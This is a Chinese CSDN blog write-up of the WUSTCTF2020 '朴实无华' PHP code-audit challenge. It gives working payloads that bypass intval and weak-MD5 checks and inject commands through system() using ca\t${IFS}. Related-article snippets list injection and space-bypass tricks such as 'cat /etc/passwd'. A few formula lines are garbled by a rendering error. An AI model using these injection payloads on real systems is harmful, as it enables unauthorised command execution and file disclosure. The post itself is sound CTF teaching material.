[WUSTCTF2020]朴实无华 1(代码审计intval、MD5、ca\t${IFS})

最新推荐文章于 2023-08-15 10:48:10 发布
最新推荐文章于 2023-08-15 10:48:10 发布
阅读量219 收藏
点赞数
分类专栏: 网络安全 文章标签: php
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_45577185/article/details/120191077
版权

刚打开时乱码:
解决方法:firefox浏览器->地址栏点击右键->菜单栏->查看->修复文字编码
在这里插入图片描述
发现有bot的字样,打开robots.txt
在这里插入图片描述
发现fAke_f1agggg.php,打开

啥都没有,抓一下当前网页的包
在这里插入图片描述
发现 /fl4g.php,打开,发现代码

<?php
header('Content-type:text/html;charset=utf-8');
error_reporting(0);
highlight_file(__file__);
//level 1
if (isset($_GET['num'])){
    $num = $_GET['num'];
    if(intval($num) < 2020 && intval($num + 1) > 2021){
        echo "我不经意间看了看我的劳力士, 不是想看时间, 只是想不经意间, 让你知道我过得比你好.</br>";
    }else{
        die("金钱解决不了穷人的本质问题");
    }
}else{
    die("去非洲吧");
}
//level 2
if (isset($_GET['md5'])){
   $md5=$_GET['md5'];
   if ($md5==md5($md5))
       echo "想到这个CTFer拿到flag后, 感激涕零, 跑去东澜岸, 找一家餐厅, 把厨师轰出去, 自己炒两个拿手小菜, 倒一杯散装白酒, 致富有道, 别学小暴.</br>";
   else
       die("我赶紧喊来我的酒肉朋友, 他打了个电话, 把他一家安排到了非洲");
}else{
    die("去非洲吧");
}

//get flag
if (isset($_GET['get_flag'])){
    $get_flag = $_GET['get_flag'];
    if(!strstr($get_flag," ")){
        $get_flag = str_ireplace("cat", "wctf2020", $get_flag);
        echo "想到这里, 我充实而欣慰, 有钱人的快乐往往就是这么的朴实无华, 且枯燥.</br>";
        system($get_flag);
    }else{
        die("快到非洲了");
    }
}else{
    die("去非洲吧");
}
?>

遇到die直接退出,所以为了防止遇到die,我们有三关要过

第一关:if(intval(KaTeX parse error: Expected 'EOF', got '&' at position 13: num) < 2020 &̲& intval(num + 1) > 2021)
intval() 函数用于获取变量的整数值
发现intval()函数在处理字符串型的科学计数法时,只输出e前面的数字

<?php
echo intval(1e10);
echo "\r\n";
echo intval("1e10");
echo "\r\n";
echo intval("1e10"+1);
?>

输出结果

10000000000
1
10000000001

发现$a+1,如果$a是字符串型的科学计数法,$a+1后,$a会强制转换为数字
所以,url:/fl4g.php?num=1e10

第二关:if ( m d 5 = = m d 5 ( md5==md5( md5==md5(md5))
md5弱类型
借别人脚本跑一下:

import hashlib

for i in range(0,10**41):
    i='0e'+str(i)
    md5=hashlib.md5(i.encode()).hexdigest()
    if md5[:2]=='0e' and md5[2:].isdigit():
        print('md5:{} '.format(i))
        break

结果:

md5:0e215962017

url:/fl4g.php?num=1e10&md5=0e141&md5=0e215962017

第三关:保证get_flag的值不能有空格,不能使用cat

strstr() 函数搜索字符串在另一字符串中的第一次出现。
查找 "Shanghai""I love Shanghai!" 中的第一次出现,并返回字符串的剩余部分:
<?php
echo strstr("I love Shanghai!","Shanghai");
?>

str_ireplace() 函数替换字符串中的一些字符(不区分大小写)。
把字符串 "Hello world!" 中的字符 "WORLD"(不区分大小写)替换成 "Shanghai"<?php
echo str_ireplace("WORLD","Shanghai","Hello world!");
?>

空格用$IFS$9${IFS}代替
在这里插入图片描述
在这里插入图片描述
开始我使用ca\t${IFS}flag却得不到flag
纠结了很久发现,要先使用&get_flag=ls查看
在这里插入图片描述
然后使用&get_flag=ca\t${IFS}fllllllllllllllllllllllllllllllllllllllllaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaag得到flag
在这里插入图片描述
payload:

/fl4g.php?num=2e5&md5=0e215962017&get_flag=ca\t${IFS}fllllllllllllllllllllllllllllllllllllllllaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaag
满月*
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
web安全之命令执行(六)
Delity的博客
07-08 3637
一、命令执行漏洞介绍 命令执行(Command Execution)漏洞即黑客可以直接在Web应用中执行系统命令,从而获取敏感信息或者拿下shell权限,可能造成的原因是Web服务器对用户输入命令安全检测不足,导致恶意代码被执行,更常见的命令执行漏洞是发生在各种Web组件,包括Web容器、Web框架、CMS软件、安全组件等 二、PHP与命令执行漏洞相关的函数: 1、PHP的5种命令执行函数:system()、exec()、passthru()、shell_exec()、“运算符 eval()函数注入攻击,将
[WUSTCTF2020]朴实无华1
qq_63169208的博客
07-02 1824
这个真的是各种绕过
WAF绕过之命令执行
Williamanddog的博客
02-06 359
exec() #不输出结果,返回最后一行shell结果,所有结果保存到一个返回数组里。passthru() #只调用命令,把命令的运行结果原样地直接输出到标准输出设备上。popen()、proc_open() #不会直接返回执行结果,而是返回一个文件指针。shell_exec() #通过shell执行命令并以字符串的形式返回完整的输出。system() #输出并返回最后一行shell结果。%a%%b% //正常执行whoami。%a%%b% //正常执行whoami。#在php的ping环境中。
[WUSTCTF2020]朴实无华1--writeup
最新发布
m0_65080524的博客
08-15 181
而1e4其实等于10000 这是一种科学计数法,具体来说,1e4 中的 1 表示基数(也称为尾数或有效数字),而 4 表示指数。这可以解释为 1 乘以 10 的 4 次方,即 1 * 10^4,等于 10000。要求是原值与md5值进行弱比较相等 而有一个值正好即0e215962017 因为是弱比较,而且0e215962017的md值也是0e开头所以它们弱比较即是0=0。intval()函数作用是在处理数据时会在接触到字符串时停止,即11y58=11,x58=0,1e4=1。发现fl4g.php点开看看。
linux shell bash -c $IFS ${IFS}
qq_29060627的博客
04-30 932
root@out:~# aa='echo${IFS}-e${IFS}-n${IFS}"123\\\n456"' root@out:~# bash -c $aa; 123\n456root@out:~# root@out:~# 如上所示:为什么需要${IFS}? 其实可以不用$IFS,只用把$aa用 双引号 引起来. root@out:~# cc='sleep "1";echo -e "123\n456"'; root@out:~# echo $cc sleep "1";ech...
php下intval()和(int)转换使用与区别
10-30
`intval()`函数和`(int)`或`(integer)`类型转换操作符都是用来将非整数类型的值转化为整数的,但它们之间存在一些微妙的区别。 **intval()函数** `intval()`是一个内置的PHP函数,它的主要功能是从变量`$var`中...
php intval的测试代码发现问题
12-18
<?... for($a = 1; $a < 100; $a++){ $o += 0.1; echo “ intval(‘$o’)... 结果: intval(‘0.2’) = 0 false intval(‘0.3’) = 0 false intval(‘0.4’) = 0 false intval(‘0.5’) = 0
php intval函数用法总结
01-20
语法: int intval ( $var, $base ) 参数: 此函数接受两个参数,其中一个是必需的,而另一个是可选的。...intval()函数代码使用示例1: <?php $var = '7.423'; $int_value = intval($var); echo $in
[WUSTCTF2020]朴实无华
qq_43801002的博客
04-29 1958
题目: 题目一打开显示乱码,我们用火狐浏览器调整一下编码就OK,但是不知道为什么qq浏览器调整之后还是不行 火狐浏览器->三道杠->更多->文字编码->Unicode就可以了 痛苦才刚刚开始 1.看到bot字眼,第一眼想到buu的bot机器人,然后就想到robots.txt网站的爬虫规则,访问一下,果然有料 2.访问一下fAke_f1agggg.php,我就知道不会...
[WUSTCTF2020]朴实无华 1
shinygod的博客
03-20 902
知识点:intval特性 ’==‘ linux绕过空格 进题目一串乱码,但有个bot,而网页中带bot,robots.txt 进robots.txt 进入fAke。。。 进入fl4g.php可以看到三层过滤。 1、第一层:要使得intval($num) < 2020 && intval($num + 1) > 2021 在做之前先看个东西,这两张图说明了,intval会解析科学计数法,且当解析字符串时会保留第一个字符前的数字。 那么这层可以传个num=1e10; 原
命令注入总结
weixin_44576725的博客
12-15 6366
文章目录命令注入总结原理常见的危险函数PHPsystemexecpassthrushell_execpopenproc_open反引号Pythonsystempopensubprocess.call/subprocess.runspawnJavajava.lang.Runtime.getRuntime().exec(command)Linux下常用的符号特殊符号通配符常用绕过命令分隔与执行多条命令空格绕过绕过 escapeshellcmd黑名单绕过无参数rce过滤字母或数字常用读取文件方式常用读取目录方式利
[CTF技巧]命令注入绕过总结
3tefanie丶zhou的博客
07-08 3427
命令分隔符 cat /etc/passwd;ls 分号 ; cmd1;cmd2(多条语句顺序执行) cat /etc/passwd && ls and && cmd1&&cmd2 与命令,cmd1成功则执行cmd2,cmd1失败则不执行cmd2 cat etc || ls or || cmd1 || cmd2 cmd1执行失败则执行cmd2,若cmd1执行成功则不执行cmd2 管道符 | | 管道符 管道符”|“
[CTF] 关于php代码审计MD5类的练习
ZXW_NUDT的博客
12-03 2717
练习1 PHP代码: <?php error_reporting(0); highlight_file("pass-01.php"); if(isset($_GET["pass"])){ if($_GET["pass"] != hash("md4", $_GET["pass"])){ die('fail~~~'); }else{ echo "success!!!<br>";
$IFS
include_heqile的博客
11-24 991
Example: $ cat test 1 2 3 4 5 6 7 8 9 It will take every number as new variable, because every whitespace (be it single space, tab or new line is considered field separator) $ for i in $(cat test...
【CTF】CTF 中绕过空格的奇淫技巧
边扯边淡
11-16 1864
起序:学到了,技巧太骚了,总结一下。 ${IFS} $IFS$9 < <> {,} cat flag.txt cat${IFS}flag.txt cat$IFS$9flag.txt cat<flag.txt cat<>flag.txt {cat,flag.txt} 如果对您有帮助,点个赞再走吧。
CTF关于ping命令注入问题(1)
热门推荐
欢迎来到神林的博客
03-07 1万+
题目样式 对于看到ping或者ping命令却没有弄waf时就要想到命令注入。 具体注入方法 看到ping命令就可以利用截断来执行新的命令。 首先测试所有的截断符号: ‘$’ ‘;’ ‘|’ ‘-’ ‘(’ ‘)’ ‘反引号’ ‘||’ ‘&amp;&amp;’ ‘&amp;’ ‘}’ ‘{’ '%0a’可以当作空格来用; 利用截断符号配合普通命令简单问题基本就出来; 例如:ip=127.0.0.1...
shell环境变量$IFS的用法
weixin_33973600的博客
02-28 345
shell环境变量$IFS的用法 S表示 Internal Field Separator (内部字段分隔符) 示例: $ IFS=: $ a=Hello:World $ echo $a 输出的结果是: Hello World 而不是: Hello:World ...
intval($num,0)
07-11
intval函数的第二个参数是可选的,它指定了进制。默认情况下,进制为10,也就是十进制。如果将第二个参数设置为0,则intval函数会自动根据变量的格式来确定进制。 例如,如果变量是一个字符串,并且以"0x"或"0X...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值